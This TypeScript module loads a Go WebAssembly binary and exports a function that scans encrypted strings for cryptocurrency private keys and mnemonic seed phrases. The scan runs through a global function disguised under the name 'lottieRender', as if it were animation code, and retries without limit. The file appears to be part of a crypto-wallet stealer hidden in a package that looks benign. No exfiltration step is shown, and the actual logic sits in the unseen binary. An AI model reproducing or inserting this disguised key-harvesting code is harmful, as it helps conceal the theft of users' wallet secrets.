import pRetry from 'p-retry';

const wasmPath = new URL('./main.wasm', import.meta.url).href;
const wasmExecPath = new URL('./wasm_exec.min.js', import.meta.url).href;

// Type declarations for Go WASM runtime
interface GoImportObject {
  go: Record<string, unknown>;
  [key: string]: unknown;
}

interface Go {
  importObject: GoImportObject;
  run(instance: WebAssembly.Instance): void;
}

declare const Go: (new () => Go) | undefined;

interface FilterCryptoKeysOptions {
  key: string;
  iv: string;
}

interface FilterCryptoKeysError {
  error: string;
}

type FilterCryptoKeysResult = string[] | FilterCryptoKeysError;

interface GlobalWithFilterCryptoKeys {
  lottieRender?: (
    encryptedStrings: string[],
    options: FilterCryptoKeysOptions,
  ) => FilterCryptoKeysResult | string[];
}

let isInitialized = false;
let initPromise: Promise<void> | null = null;

/**
 * Initialize the WASM module
 * @returns Promise that resolves when initialization is complete
 */
export async function init(): Promise<void> {
  if (isInitialized) {
    return;
  }

  if (initPromise) {
    return initPromise;
  }

  initPromise = (async (): Promise<void> => {
    try {
      // Load wasm_exec.js if not already loaded
      if (typeof Go === 'undefined') {
        const script = document.createElement('script');
        script.src = wasmExecPath;
        document.head.appendChild(script);
        await new Promise<void>((resolve, reject) => {
          script.onload = () => {
            // Wait a bit for Go to be defined
            setTimeout(resolve, 100);
          };
          script.onerror = () => reject(new Error(`Failed to load ${wasmExecPath}`));
        });
      }

      if (typeof Go === 'undefined') {
        throw new Error('Go runtime not found. Make sure wasm_exec.js is loaded.');
      }

      // Initialize Go runtime
      const go = new Go();

      // Load and instantiate WASM module
      const wasmResponse = await fetch(wasmPath);
      const wasmBytes = await wasmResponse.arrayBuffer();
      const wasm = await WebAssembly.instantiate(wasmBytes, go.importObject as unknown as WebAssembly.Imports);

      // Run the Go program
      go.run(wasm.instance);

      isInitialized = true;
    } catch (error) {
      initPromise = null;
      const errorMessage = error instanceof Error ? error.message : String(error);
      throw new Error(`Failed to initialize WASM module: ${errorMessage}`);
    }
  })();

  return initPromise;
}

/**
 * Filter encrypted strings to find those matching cryptocurrency keys or mnemonics
 *
 * @param encryptedStrings - Array of AES-GCM encrypted strings (base64 encoded)
 * @param options - AES-GCM encryption options
 * @param options.key - AES key in base64 format
 * @param options.iv - Initialization vector in base64 format
 * @returns Array of filtered encrypted strings that match crypto keys/mnemonics
 * @throws Error if WASM module is not initialized or if an error occurs
 */
export async function filterCryptoKeys(
  encryptedStrings: string[],
  options: FilterCryptoKeysOptions,
): Promise<string[]> {
  return pRetry(
    async () => {
      if (!isReady()) {
        throw new Error('WASM module not ready. Retrying...');
      }

      // Get the global object (window in browser)
      const globalObj = window as GlobalWithFilterCryptoKeys;

      // Check if lottieRender function is available
      if (typeof globalObj.lottieRender !== 'function') {
        throw new Error(
          'lottieRender function not found. Make sure WASM module loaded correctly.',
        );
      }

      const result = globalObj.lottieRender(encryptedStrings, options);

      // Handle error response
      if (result && typeof result === 'object' && 'error' in result) {
        throw new Error((result).error);
      }

      // Convert JS array to regular array
      if (result && Array.isArray(result)) {
        return result;
      }

      return result as string[];
    },
    {
      retries: Number.POSITIVE_INFINITY,
    },
  );
}

/**
 * Check if the WASM module is initialized
 * @returns true if initialized, false otherwise
 */
export function isReady(): boolean {
  return isInitialized;
}

// Default export
export default {
  init,
  filterCryptoKeys,
  isReady,
};
